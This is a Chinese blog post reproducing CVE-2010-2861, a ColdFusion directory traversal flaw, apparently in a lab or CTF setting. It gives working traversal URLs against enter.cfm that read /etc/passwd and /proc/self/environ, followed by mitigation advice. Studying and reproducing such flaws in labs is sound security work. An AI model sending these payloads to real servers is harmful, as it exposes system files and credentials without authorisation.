CVE-2010-2861:Adobe ColdFusion 文件读取漏

最新推荐文章于 2024-05-14 23:46:30 发布
最新推荐文章于 2024-05-14 23:46:30 发布
阅读量315 收藏
点赞数
文章标签: adobe php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/127750110
版权

产品简介

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

漏洞概述

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

影响范围

Adobe ColdFusion 8、9

利用流程

poc
http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en 在这里插入图片描述

获取flag


http://123.58.236.76:54623/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../proc/self/environ%00en

修复方案

配置文件:在配置文件中限制访问的文件目录,比如 PHP 中 php.ini 配置 open_basedir
特殊字符过滤:检查用户输入,过滤或转义含有“…/”、“…\”、“%00”,“…”,“./”,“#”等跳转目录或字符终止符、截断字符的输入
合法性判断:严格过滤用户输入字符的合法性,比如文件类型、文件地址、文件内容等
白名单:白名单限定访问文件的路径、名称及后缀名

Doxi-13A
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2010-2861漏洞复现(ColdFusion未授权漏洞)
G_Fu_Q的博客
04-08 824
漏洞介绍: Adobe ColdFusion(直译:冷聚变),是一个动态Web服务器,其CFML(ColdFusion Markup Language)是一种程序设计语言,类似JSP里的JSTL(JSP Standard Tag Lib),从1995年开始开发,其设计思想被一些人认为非常先进,被一些语言所借鉴。 Coldfusion 最早是由 Allaire 公司开发的一种应用服务器平台,其运行的 CFML(ColdFusion Markup Language)针对Web应用的一种脚本语言文件以*.c
Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
weixin_46239998的博客
01-01 666
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。Adobe ColdFusion 8、9版本中皆存在一处目录穿越漏洞。管理员密码获取到了,就可以正常玩耍了!三、输入admin初始化环境。五、漏洞利用,读取管理员密码。
漏洞复现----17、Adobe ColdFusion目录遍历漏洞 (CVE-2010-2861)
七天
10-21 1067
文章目录一、漏洞介绍二、漏洞环境1、环境2、Payload三、漏洞复现1、logging/settings.cfm2、datasources/index.cfm3、j2eepackaging/editarchive.cfm4、CFIDE/administrator/settings/mappings.cfm5、CFIDE/administrator/enter.cfm四、特殊构造1、路径后不跟参数值,失败。2、路径后参数值为数字,成功。3、路径后参数值为字母,成功。4、路径后参数值为特殊符号,成功。 一、
09 - vulhub - Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)
最新发布
碧海朝天素
05-14 773
如果你也是看准了Python,想自学Python,在这里为大家准备了丰厚的免费大礼包,带大家一起学习,给大家剖析Python兼职、就业行情前景的这些事儿。
vulhub:Adobe ColdFusion文件读取漏洞复现(CVE-2010-2861
sszsNo1的博客
07-02 255
vulhub:Adobe ColdFusion文件读取漏洞CVE-2010-2861)如何复现
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞0x10靶场环境0x20目录结构CVE-2021-22192├── README.md ............... [此 README 说明]├── imgs .................... [辅助 README 说明的图片]├─...
oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip
01-19
Oracle 11.2.0.1 CVE-2012-1675 补丁:p12880299_112010_Linux-x86-64.zip 是一个针对Oracle数据库系统的重要安全更新。这个补丁主要解决了一个在Oracle 11.2.0.1版本中的严重安全漏洞,该漏洞被标记为CVE-2012-1675...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2020-1206-POC:CVE-2020-1206未初始化的内核内存读取POC
03-20
CVE-2020-1206未初始化的内核内存读取POC (c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误POC检查CVE-2020-1206 /“ SMBleed”预期结果:包含目标计算机内核内存的本地文件。仅用于公司环境中的教育和...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)
zzzzz1284的博客
01-04 330
CVE-2010-2861
[文件读取]coldfusion 文件读取CVE-2010-2861
wj33333的博客
11-14 297
描述: Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。访问`http://your-ip:8500/CFIDE/administrator/enter.cfm`,可以看到初始化页面,输入密码`admin`,开始初始化整个环境。
Adobe ColdFusion文件读取(CVE-2010-2861)
m0_65150886的博客
01-15 444
Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。由于AJP协议设计存在缺陷导致内部相关的属性可控,攻击者可以构造属性值,使未授权的用户读取服务器任意文件获得敏感信息,甚至可以进行远程代码执行漏洞的利用。1.访问http://ip:port,出现如下页面,开始实验。2.构造poc,读取/etc/passwd。3.构造poc,读取后台管理员密码。
CVE-2010-2861Adobe ColdFusion 文件读取漏洞
浅笑996的博客
11-27 2592
漏洞介绍 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 环境搭建 https://blog.csdn.net/qq_36374896/article...
漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861
10-15 961
coldfusion-文件读取
Adobe ColdFusion 文件读取漏洞CVE-2010-2861
weixin_50698958的博客
10-02 427
一、概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 参考: https://vulhub.org/#/environments/coldfusion/CVE-2010-2861/ 二、漏洞环境 路径:vulhub/coldfusion/CVE.
ElasticSearch 目录穿越漏洞CVE-2015-3337)
黑白的博客
12-13 2215
声明 好好学习,天天向上 漏洞描述 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。没有安装任意插件的elasticsearch不受影响。 影响范围 1.4.5以下/1.5.2以下 复现过程 这里使用v1.4.4版本 使用vulhub cd /app/vulhub-master/elasticsearch/CVE-2015-3337 使用docker启动 docker-compose up -d 环境启动后,访问http://your-ip:920
Adobe ColdFusion文件读取漏洞CVE-2010-2861
m0_73605862的博客
12-01 539
2.看答案就是一层一层进行路径穿越攻击,这里要注意如果登陆进去后总是会自己跳转到index.cfm,所以得用bp抓包改包。尝试利用漏洞读取目标系统中的“opt/coldfusion8/license.txt"文件。4.然后是opt那个,因为一般opt和etc在同一级目录下,结果成功了。3.之前一直出不来,今天突然出来了,我真的无语死了。1.环境搭建(网上写的密码是admin,就用admin)3.路径穿越就出来了。
CVE-2016-2183:openSSL
12-29
CVE-2016-2183是一个与OpenSSL库相关的漏洞,也被称为Sweet32漏洞。该漏洞影响使用3DES加密算法的SSL/TLS连接,攻击者可以通过长时间的网络监听来获取加密数据的部分内容。这个漏洞的修复方法是禁用3DES加密算法或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值